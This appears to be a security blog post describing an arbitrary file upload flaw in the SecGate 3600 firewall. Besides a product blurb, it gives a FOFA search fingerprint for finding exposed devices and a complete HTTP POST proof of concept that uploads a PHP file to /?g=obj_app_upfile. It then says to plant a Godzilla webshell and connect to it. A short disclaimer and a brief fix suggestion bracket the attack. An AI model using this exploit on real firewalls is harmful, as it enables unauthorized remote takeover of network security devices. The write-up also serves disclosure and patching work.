Arbitrary File Upload Vulnerability in SecGate 3600 Firewall
Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.
1. Product Introduction
Wangshen SecGate3600 next-generation ultra-fast firewall (NSG series) is based on the mature and stable third-generation SecOS operating system of Netshen, which is completely independently developed and tested by the market, and is carefully developed on the basis of years of product experience in professional firewalls, VPNs, and IPS. The high-performance next-generation firewall is specially designed for the Internet egress of operators, governments, military, education, large enterprises, and small and medium-sized enterprises. Active defense intelligent security gateway with technology in one.
2. Vulnerability overview
There is an arbitrary file upload vulnerability in the obj_app_upfile interface of the SecGate 3600 firewall. Unauthorized attackers can upload arbitrary files through the vulnerability to obtain server permissions.
3. Scope of influence
Wangshen SecGate 3600 Firewall
4. Reproduction environment
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
5. Vulnerability recurrence
PoC
POST /?g=obj_app_upfile HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 574
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10000000
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: text/plain
马子
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="submit_post"
obj_app_upfile
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="__hash__"
0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundaryJpMyThWnAxbcBBQc--
upload godzilla
verify url
https://your-ip/attachements/1.php
try to connect
Xiaolong POC detection:
6. Repair suggestions
Close the exposed surface of the Internet, and set up strong authentication for the file upload module.